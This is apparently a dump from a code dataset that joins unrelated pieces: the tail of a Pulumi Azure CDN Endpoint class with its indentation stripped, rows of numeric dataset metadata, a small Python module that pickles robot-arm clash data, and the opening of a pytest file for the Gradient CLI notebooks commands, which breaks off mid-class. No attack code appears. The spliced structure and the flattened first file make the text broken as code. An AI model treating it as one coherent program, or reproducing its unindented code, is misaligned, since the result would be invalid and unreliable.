* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **origins** object supports the following:
* `host_name` (`pulumi.Input[str]`) - A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
* `httpPort` (`pulumi.Input[float]`) - The HTTP port of the origin. Defaults to `80`. Changing this forces a new resource to be created.
* `httpsPort` (`pulumi.Input[float]`) - The HTTPS port of the origin. Defaults to `443`. Changing this forces a new resource to be created.
* `name` (`pulumi.Input[str]`) - The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
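A minimal sketch of a single `delivery_rules` entry under the schema above (the rule name, order, paths, and durations are illustrative assumptions):

```python
delivery_rules=[{
    "name": "rule1",
    "order": 2,
    "urlPathConditions": [{
        "operator": "BeginsWith",
        "matchValues": ["/images"],
    }],
    "cacheExpirationAction": {
        "behavior": "Override",
        "duration": "1.00:00:00",  # [d.]hh:mm:ss
    },
}]
```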
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['content_types_to_compresses'] = content_types_to_compresses
__props__['delivery_rules'] = delivery_rules
__props__['geo_filters'] = geo_filters
__props__['global_delivery_rule'] = global_delivery_rule
__props__['is_compression_enabled'] = is_compression_enabled
__props__['is_http_allowed'] = is_http_allowed
__props__['is_https_allowed'] = is_https_allowed
__props__['location'] = location
__props__['name'] = name
__props__['optimization_type'] = optimization_type
__props__['origin_host_header'] = origin_host_header
__props__['origin_path'] = origin_path
if origins is None:
raise TypeError("Missing required property 'origins'")
__props__['origins'] = origins
__props__['probe_path'] = probe_path
if profile_name is None:
raise TypeError("Missing required property 'profile_name'")
__props__['profile_name'] = profile_name
__props__['querystring_caching_behaviour'] = querystring_caching_behaviour
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['tags'] = tags
__props__['host_name'] = None
super(Endpoint, __self__).__init__(
'azure:cdn/endpoint:Endpoint',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, content_types_to_compresses=None, delivery_rules=None, geo_filters=None, global_delivery_rule=None, host_name=None, is_compression_enabled=None, is_http_allowed=None, is_https_allowed=None, location=None, name=None, optimization_type=None, origin_host_header=None, origin_path=None, origins=None, probe_path=None, profile_name=None, querystring_caching_behaviour=None, resource_group_name=None, tags=None):
"""
Get an existing Endpoint resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
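A minimal lookup sketch (the ID below is a placeholder shape, not a real resource ID):

```python
existing = Endpoint.get("existing-endpoint",
    id="/subscriptions/<subscription>/resourceGroups/<rg>/providers/Microsoft.Cdn/profiles/<profile>/endpoints/<endpoint>")
```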
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] content_types_to_compresses: An array of strings indicating the content types to which compression is applied. The elements should be MIME types.
:param pulumi.Input[list] delivery_rules: Rules for the rules engine. An endpoint can contain up to 4 such rules, each consisting of conditions and actions. Each `delivery_rule` block is as defined below.
:param pulumi.Input[list] geo_filters: A set of Geo Filters for this CDN Endpoint. Each `geo_filter` block supports fields documented below.
:param pulumi.Input[dict] global_delivery_rule: Actions that are valid for all resources regardless of any conditions. A `global_delivery_rule` block as defined below.
:param pulumi.Input[str] host_name: A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
:param pulumi.Input[bool] is_compression_enabled: Indicates whether compression is enabled. Defaults to `false`.
:param pulumi.Input[bool] is_http_allowed: Specifies whether HTTP traffic is allowed on the endpoint. Defaults to `true`.
:param pulumi.Input[bool] is_https_allowed: Specifies whether HTTPS traffic is allowed on the endpoint. Defaults to `true`.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the CDN Endpoint. Changing this forces a new resource to be created.
:param pulumi.Input[str] optimization_type: What types of optimization should this CDN Endpoint optimize for? Possible values include `DynamicSiteAcceleration`, `GeneralMediaStreaming`, `GeneralWebDelivery`, `LargeFileDownload` and `VideoOnDemandMediaStreaming`.
:param pulumi.Input[str] origin_host_header: The host header the CDN provider will send along with content requests to origins. Defaults to the host name of the origin.
:param pulumi.Input[str] origin_path: The path used for origin requests.
:param pulumi.Input[list] origins: The set of origins of the CDN endpoint. When multiple origins exist, the first origin is used as the primary and the rest are used as failover options. Each `origin` block supports fields documented below.
:param pulumi.Input[str] probe_path: The path to a file hosted on the origin which helps accelerate delivery of dynamic content and calculate the optimal routes for the CDN. This is relative to the `origin_path`.
:param pulumi.Input[str] profile_name: The CDN Profile to which to attach the CDN Endpoint.
:param pulumi.Input[str] querystring_caching_behaviour: Sets query string caching behavior. Allowed values are `IgnoreQueryString`, `BypassCaching` and `UseQueryString`. Defaults to `IgnoreQueryString`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the CDN Endpoint.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **delivery_rules** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `cookiesConditions` (`pulumi.Input[list]`) - A `cookies_condition` block as defined above.
* `matchValues` (`pulumi.Input[list]`) - List of values for the cookie.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the cookie.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `deviceCondition` (`pulumi.Input[dict]`) - A `device_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `Desktop` and `Mobile`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `httpVersionConditions` (`pulumi.Input[list]`) - A `http_version_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `0.9`, `1.0`, `1.1` and `2.0`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `name` (`pulumi.Input[str]`) - The Name which should be used for this Delivery Rule.
* `order` (`pulumi.Input[float]`) - The order used for this rule, which must be larger than 1.
* `postArgConditions` (`pulumi.Input[list]`) - A `post_arg_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Name of the post arg.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `queryStringConditions` (`pulumi.Input[list]`) - A `query_string_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `remoteAddressConditions` (`pulumi.Input[list]`) - A `remote_address_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values. For the `GeoMatch` `operator` this should be a list of country codes (e.g. `US` or `DE`); for the `IPMatch` `operator`, a list of IP addresses.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `GeoMatch` and `IPMatch`.
* `requestBodyConditions` (`pulumi.Input[list]`) - A `request_body_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestHeaderConditions` (`pulumi.Input[list]`) - A `request_header_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of header values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `selector` (`pulumi.Input[str]`) - Header name.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `requestMethodCondition` (`pulumi.Input[dict]`) - A `request_method_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `DELETE`, `GET`, `HEAD`, `OPTIONS`, `POST` and `PUT`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `requestSchemeCondition` (`pulumi.Input[dict]`) - A `request_scheme_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - Valid values are `HTTP` and `HTTPS`.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - The only valid value is `Equal`.
* `requestUriConditions` (`pulumi.Input[list]`) - A `request_uri_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileExtensionConditions` (`pulumi.Input[list]`) - A `url_file_extension_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlFileNameConditions` (`pulumi.Input[list]`) - A `url_file_name_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlPathConditions` (`pulumi.Input[list]`) - A `url_path_condition` block as defined below.
* `matchValues` (`pulumi.Input[list]`) - List of string values.
* `negateCondition` (`pulumi.Input[bool]`) - Defaults to `false`.
* `operator` (`pulumi.Input[str]`) - Valid values are `Any`, `BeginsWith`, `Contains`, `EndsWith`, `Equal`, `GreaterThan`, `GreaterThanOrEqual`, `LessThan` and `LessThanOrEqual`.
* `transforms` (`pulumi.Input[list]`) - Valid values are `Lowercase` and `Uppercase`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **geo_filters** object supports the following:
* `action` (`pulumi.Input[str]`) - The Action of the Geo Filter. Possible values include `Allow` and `Block`.
* `countryCodes` (`pulumi.Input[list]`) - A list of two-letter country codes (e.g. `US`, `GB`) to be associated with this Geo Filter.
* `relative_path` (`pulumi.Input[str]`) - The relative path applicable to the geo filter.
The **global_delivery_rule** object supports the following:
* `cacheExpirationAction` (`pulumi.Input[dict]`) - A `cache_expiration_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache. Valid values are `BypassCache`, `Override` and `SetIfMissing`.
* `duration` (`pulumi.Input[str]`) - Duration of the cache. Only allowed when `behavior` is set to `Override` or `SetIfMissing`. Format: `[d.]hh:mm:ss`
* `cacheKeyQueryStringAction` (`pulumi.Input[dict]`) - A `cache_key_query_string_action` block as defined above.
* `behavior` (`pulumi.Input[str]`) - The behavior of the cache key for query strings. Valid values are `Exclude`, `ExcludeAll`, `Include` and `IncludeAll`.
* `parameters` (`pulumi.Input[str]`) - Comma separated list of parameter values.
* `modifyRequestHeaderActions` (`pulumi.Input[list]`) - A `modify_request_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `modifyResponseHeaderActions` (`pulumi.Input[list]`) - A `modify_response_header_action` block as defined below.
* `action` (`pulumi.Input[str]`) - Action to be executed on a header value. Valid values are `Append`, `Delete` and `Overwrite`.
* `name` (`pulumi.Input[str]`) - The header name.
* `value` (`pulumi.Input[str]`) - The value of the header. Only needed when `action` is set to `Append` or `Overwrite`.
* `urlRedirectAction` (`pulumi.Input[dict]`) - A `url_redirect_action` block as defined below.
* `fragment` (`pulumi.Input[str]`) - Specifies the fragment part of the URL. This value must not start with a `#`.
* `hostname` (`pulumi.Input[str]`) - Specifies the hostname part of the URL.
* `path` (`pulumi.Input[str]`) - Specifies the path part of the URL. This value must begin with a `/`.
* `protocol` (`pulumi.Input[str]`) - Specifies the protocol part of the URL. Valid values are `Http` and `Https`.
* `queryString` (`pulumi.Input[str]`) - Specifies the query string part of the URL. This value must not start with a `?` or `&` and must be in `<key>=<value>` format separated by `&`.
* `redirectType` (`pulumi.Input[str]`) - Type of the redirect. Valid values are `Found`, `Moved`, `PermanentRedirect` and `TemporaryRedirect`.
* `urlRewriteAction` (`pulumi.Input[dict]`) - A `url_rewrite_action` block as defined below.
* `destination` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
* `preserveUnmatchedPath` (`pulumi.Input[bool]`) - Defaults to `true`.
* `sourcePattern` (`pulumi.Input[str]`) - This value must start with a `/` and can't be longer than 260 characters.
The **origins** object supports the following:
* `host_name` (`pulumi.Input[str]`) - A string that determines the hostname/IP address of the origin server. This string can be a domain name, Storage Account endpoint, Web App endpoint, IPv4 address or IPv6 address. Changing this forces a new resource to be created.
* `httpPort` (`pulumi.Input[float]`) - The HTTP port of the origin. Defaults to `80`. Changing this forces a new resource to be created.
* `httpsPort` (`pulumi.Input[float]`) - The HTTPS port of the origin. Defaults to `443`. Changing this forces a new resource to be created.
* `name` (`pulumi.Input[str]`) - The name of the origin. This is an arbitrary value. However, this value needs to be unique under the endpoint. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["content_types_to_compresses"] = content_types_to_compresses
__props__["delivery_rules"] = delivery_rules
__props__["geo_filters"] = geo_filters
__props__["global_delivery_rule"] = global_delivery_rule
__props__["host_name"] = host_name
__props__["is_compression_enabled"] = is_compression_enabled
__props__["is_http_allowed"] = is_http_allowed
__props__["is_https_allowed"] = is_https_allowed
__props__["location"] = location
__props__["name"] = name
__props__["optimization_type"] = optimization_type
__props__["origin_host_header"] = origin_host_header
__props__["origin_path"] = origin_path
__props__["origins"] = origins
__props__["probe_path"] = probe_path
__props__["profile_name"] = profile_name
__props__["querystring_caching_behaviour"] = querystring_caching_behaviour
__props__["resource_group_name"] = resource_group_name
__props__["tags"] = tags
return Endpoint(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 81.822443
| 489
| 0.662813
| 6,975
| 57,603
| 5.376057
| 0.056201
| 0.085365
| 0.050403
| 0.033442
| 0.949411
| 0.94629
| 0.941464
| 0.937357
| 0.918742
| 0.914849
| 0
| 0.002021
| 0.209798
| 57,603
| 703
| 490
| 81.938834
| 0.821785
| 0.596202
| 0
| 0.019802
| 1
| 0
| 0.161389
| 0.034729
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039604
| false
| 0.009901
| 0.059406
| 0.019802
| 0.326733
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
55c64e6db27fa0e0bc7b70d5cb7799119ea0b394
| 1,537
|
py
|
Python
|
roadmap_tools/scripts/file_handler.py
|
JKBehrens/STAAMS-Solver
|
b6837da69cda574d081ab3dc0b307e3ce40ad6f2
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 16
|
2018-12-11T13:02:58.000Z
|
2022-02-28T09:05:20.000Z
|
roadmap_tools/scripts/file_handler.py
|
stepakar/STAAMS-Solver
|
b6837da69cda574d081ab3dc0b307e3ce40ad6f2
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2019-11-04T13:16:49.000Z
|
2022-02-28T09:17:30.000Z
|
roadmap_tools/scripts/file_handler.py
|
stepakar/STAAMS-Solver
|
b6837da69cda574d081ab3dc0b307e3ce40ad6f2
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 4
|
2019-02-12T12:41:25.000Z
|
2022-02-09T12:55:56.000Z
|
#!/usr/bin/env python
"""
Copyright (c) 2018 Robert Bosch GmbH
All rights reserved.
This source code is licensed under the BSD-3-Clause license found in the
LICENSE file in the root directory of this source tree.
@author: Jan Behrens
"""
try:
    import cPickle as pickle  # Python 2: C-accelerated pickle
except ImportError:
    import pickle  # Python 3: the C implementation is used automatically
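# NOTE: file_handler and FileHandler below have identical bodies; the lowercase
# class looks like a legacy alias kept alongside the PEP 8-named one.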
class file_handler:
def load_prm(self, file_name="prm"):
with open(file_name + '.pkl', 'rb') as in_file:
loaded_prm = pickle.load(in_file)
return loaded_prm
def save_clash(self, left, right, file_name="prm_clash"):
prm_clash = {"left_arm": left, "right_arm": right}
with open(file_name + '.pkl', 'wb') as output:
pickle.dump(prm_clash, output, pickle.HIGHEST_PROTOCOL)
def load_clash(self, file_name="prm_clash"):
with open(file_name + '.pkl', 'rb') as output:
loaded_clash = pickle.load(output)
return loaded_clash
class FileHandler:
def __init__(self):
pass
def load_prm(self, file_name="prm"):
with open(file_name + '.pkl', 'rb') as in_file:
loaded_prm = pickle.load(in_file)
return loaded_prm
def save_clash(self, left, right, file_name="prm_clash"):
prm_clash = {"left_arm": left, "right_arm": right}
with open(file_name + '.pkl', 'wb') as output:
pickle.dump(prm_clash, output, pickle.HIGHEST_PROTOCOL)
def load_clash(self, file_name="prm_clash"):
with open(file_name + '.pkl', 'rb') as output:
loaded_clash = pickle.load(output)
return loaded_clash
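# A minimal usage sketch (assumed here, not part of the original module):
# round-trip a clash dictionary through "prm_clash.pkl".
if __name__ == "__main__":
    fh = FileHandler()
    fh.save_clash(left=[(0, 1)], right=[(2, 3)])
    clash = fh.load_clash()
    assert clash == {"left_arm": [(0, 1)], "right_arm": [(2, 3)]}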
| 29.557692
| 72
| 0.644112
| 219
| 1,537
| 4.296804
| 0.292237
| 0.102019
| 0.070138
| 0.102019
| 0.735388
| 0.735388
| 0.735388
| 0.735388
| 0.735388
| 0.735388
| 0
| 0.004281
| 0.240078
| 1,537
| 51
| 73
| 30.137255
| 0.80137
| 0.149642
| 0
| 0.827586
| 0
| 0
| 0.08622
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.241379
| false
| 0.034483
| 0.034483
| 0
| 0.482759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3607edf4bc12efb91d3a35611fe4368b5d8a39a0
| 63,755
|
py
|
Python
|
tests/functional/test_notebooks.py
|
Exitussru/GradientCI
|
014d4e36d8456e805b78e75562b8235221b62b9e
|
[
"0BSD"
] | null | null | null |
tests/functional/test_notebooks.py
|
Exitussru/GradientCI
|
014d4e36d8456e805b78e75562b8235221b62b9e
|
[
"0BSD"
] | null | null | null |
tests/functional/test_notebooks.py
|
Exitussru/GradientCI
|
014d4e36d8456e805b78e75562b8235221b62b9e
|
[
"0BSD"
] | null | null | null |
import json
import mock
import pytest
from click.testing import CliRunner
from gradient.api_sdk import sdk_exceptions
from gradient.api_sdk.clients.http_client import default_headers
from gradient.cli import cli
from tests import MockResponse, example_responses
EXPECTED_HEADERS = default_headers.copy()
EXPECTED_HEADERS["ps_client_name"] = "gradient-cli"
EXPECTED_HEADERS_WITH_CHANGED_API_KEY = EXPECTED_HEADERS.copy()
EXPECTED_HEADERS_WITH_CHANGED_API_KEY["X-API-Key"] = "some_key"
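# The two fixtures below stand in for the metrics websocket stream: each yields
# a few JSON frames and then raises GradientSdkError to end the stream.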
@pytest.fixture
def basic_options_metrics_stream_websocket_connection_iterator():
def generator(self):
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"memoryUsage",
"pod_metrics":{"nrwed38p":{"time_stamp":1588066152,"value":"54013952"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"cpuPercentage",
"pod_metrics":{"nrwed38p":{"time_stamp":1588066152,"value":"0.006907773333334353"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"memoryUsage",
"pod_metrics":{"nrwed38p":{"time_stamp":1588066155,"value":"12345667"}}}"""
raise sdk_exceptions.GradientSdkError()
return generator
@pytest.fixture
def all_options_metrics_stream_websocket_connection_iterator():
def generator(self):
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"gpuMemoryFree",
"pod_metrics":{"nrwed38p":{"time_stamp":1588068626,"value":"1234"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"gpuMemoryUsed",
"pod_metrics":{"nrwed38p":{"time_stamp":1588068646,"value":"32"}}}"""
yield """{"handle":"nrwed38p","object_type":"notebook","chart_name":"gpuMemoryFree",
"pod_metrics":{"nrwed38p":{"time_stamp":1588068646,"value":"2345"}}}"""
raise sdk_exceptions.GradientSdkError()
return generator
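# Each TestNotebooks* class below follows the same pattern: a COMMAND list fed
# to click's CliRunner, the JSON payload the CLI is expected to send, and the
# exact stdout expected on success and on invalid-API-token errors.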
class TestNotebooksCreate(object):
URL = "https://api.paperspace.io/notebooks/v2/createNotebook"
COMMAND = [
"notebooks",
"create",
"--machineType", "P5000",
"--container", "jupyter/notebook",
"--clusterId", "321"
]
EXPECTED_REQUEST_JSON = {
"vmTypeLabel": "P5000",
"containerName": "jupyter/notebook",
"clusterId": "321",
'isPreemptible': False,
'isPublic': False,
}
EXPECTED_RESPONSE_JSON = {
"handle": "some_id",
"notebookToken": None,
"jobId": 20163,
"isPublic": False,
"id": 1811,
"containerName": "jupyter/notebook",
}
EXPECTED_STDOUT = "Created new notebook with id: some_id\n" \
"https://www.paperspace.com/some_namespace/notebook/prg284tu2\n"
COMMAND_WITH_API_KEY_USED = [
"notebooks",
"create",
"--machineType", "P5000",
"--container", "jupyter/notebook",
"--clusterId", "321",
"--apiKey", "some_key",
]
COMMAND_WITH_ALL_OPTIONS = [
"notebooks",
"create",
"--machineType", "P5000",
"--container", "jupyter/notebook",
"--clusterId", "321",
"--name", "some_notebook_name",
"--registryUsername", "some_username",
"--registryPassword", "some_password",
"--command", "some_entrypoint",
"--containerUser", "some_container_user",
"--shutdownTimeout", "8",
"--isPreemptible",
]
EXPECTED_REQUEST_JSON_WITH_ALL_OPTIONS = {
"vmTypeLabel": "P5000",
"containerName": "jupyter/notebook",
"clusterId": "321",
"name": "some_notebook_name",
"registryUsername": "some_username",
"registryPassword": "some_password",
"defaultEntrypoint": "c29tZV9lbnRyeXBvaW50",
"containerUser": "some_container_user",
"shutdownTimeout": 8,
"isPreemptible": True,
"isPublic": False,
}
COMMAND_WITH_OPTIONS_FILE_USED = ["notebooks", "create", "--optionsFile", ] # path added in test
RESPONSE_JSON_WITH_WRONG_API_TOKEN = {"status": 400, "message": "Invalid API token"}
EXPECTED_STDOUT_WITH_WRONG_API_TOKEN = "Failed to create resource: Invalid API token\n"
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_post_request_and_print_notebook_id(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
@mock.patch("gradient.api_sdk.clients.http_client.requests.get")
@mock.patch("gradient.api_sdk.clients.http_client.requests.post")
def test_should_send_changed_headers_when_api_key_option_was_used(self, post_patched, get_patched):
post_patched.return_value = MockResponse(self.EXPECTED_RESPONSE_JSON)
get_patched.return_value = MockResponse(example_responses.NOTEBOOK_GET_RESPONSE)
runner = CliRunner()
result = runner.invoke(cli.cli, self.COMMAND_WITH_API_KEY_USED)
assert result.output == self.EXPECTED_STDOUT, result.exc_info
post_patched.assert_called_once_with(self.URL,
headers=EXPECTED_HEADERS_WITH_CHANGED_API_KEY,
json=self.EXPECTED_REQUEST_JSON,
data=None,
files=None,
params=None)
